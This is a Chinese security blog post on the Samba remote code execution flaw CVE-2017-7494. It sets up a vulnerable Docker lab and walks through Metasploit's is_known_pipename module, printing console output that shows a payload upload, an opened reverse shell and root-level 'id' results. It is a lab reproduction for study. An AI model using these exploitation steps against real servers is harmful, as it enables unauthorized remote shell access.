Samba远程代码执行漏洞(CVE-2017-7494) 附环境

  • A+
所属分类:安全文章

版权声明:

本文首发于微信号:inn0team

此文章版权归属于 inn0team 所有

转载请务必保留此声明,违者必究。

漏洞信息

2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。

镜像信息

Samba远程代码执行漏洞(CVE-2017-7494) 附环境

获取环境:

拉取镜像到本地

  1. $ docker pull medicean/vulapps:s_samba_1

启动环境

  1. $ docker run -d -p 445:445 -p 139:139 -p 138:138 -p 137:137 medicean/vulapps:s_samba_1

-445:445 前面的 445 代表物理机的端口

利用步骤

假定目标 IP 是: 192.168.35.197

  1. msf > use exploit/linux/samba/is_known_pipename

  2. msf exploit(is_known_pipename) > set RHOST 192.168.35.197

  3. RHOST => 192.168.35.197

  4. msf exploit(is_known_pipename) > show options

  5. Module options (exploit/linux/samba/is_known_pipename):

  6.   Name            Current Setting  Required  Description

  7.   ----            ---------------  --------  -----------

  8.   RHOST           192.168.35.197   yes       The target address

  9.   RPORT           445              yes       The SMB service port (TCP)

  10.   SMB_FOLDER                       no        The directory to use within the writeable SMB share

  11.   SMB_SHARE_BASE                   no        The remote filesystem path correlating with the SMB share name

  12.   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory

  13. Exploit target:

  14.   Id  Name

  15.   --  ----

  16.   2   Linux x86_64

  17. msf exploit(is_known_pipename) > run

  18. [*] Started reverse TCP handler on 192.168.35.197:4444

  19. [*] 192.168.35.197:445 - Using location \192.168.35.197share for the path

  20. [*] 192.168.35.197:445 - Payload is stored in //192.168.35.197/share/ as dDUJiiuf.so

  21. [*] 192.168.35.197:445 - Trying location /volume1/dDUJiiuf.so...

  22. [*] 192.168.35.197:445 - Trying location /volume1/share/dDUJiiuf.so...

  23. [*] 192.168.35.197:445 - Trying location /volume1/Share/dDUJiiuf.so...

  24. [*] 192.168.35.197:445 - Trying location /mnt/media/SHARE/dDUJiiuf.so...

  25. [*] 192.168.35.197:445 - Trying location /mnt/media/Share/dDUJiiuf.so...

  26. [*] 192.168.35.197:445 - Trying location /var/samba/share/dDUJiiuf.so...

  27. [*] 192.168.35.197:445 - Trying location /var/samba/SHARE/dDUJiiuf.so...

  28. [*] 192.168.35.197:445 - Trying location /var/samba/Share/dDUJiiuf.so...

  29. [*] 192.168.35.197:445 - Trying location /tmp/dDUJiiuf.so...

  30. [*] Command shell session 1 opened (192.168.35.197:4444 -> 192.168.35.197:58089) at 2017-05-25 13:26:19 +0800

  31. id

  32. uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)

如果 smb.conf 配置了 guest account = root 这一项, 则显示如下:

  1. id

  2. uid=0(root) gid=0(root) groups=0(root)

推荐阅读

  • https://github.com/rapid7/metasploit-framework/pull/8450
  • http://blogs.360.cn/blog/samba%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9Ecve-2017-7494%E5%88%86%E6%9E%90/


inn0team  一个正在成长的安全团队
微信号:inn0team
Samba远程代码执行漏洞(CVE-2017-7494) 附环境
长按可关注我们


本文始发于微信公众号(inn0team):Samba远程代码执行漏洞(CVE-2017-7494) 附环境

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: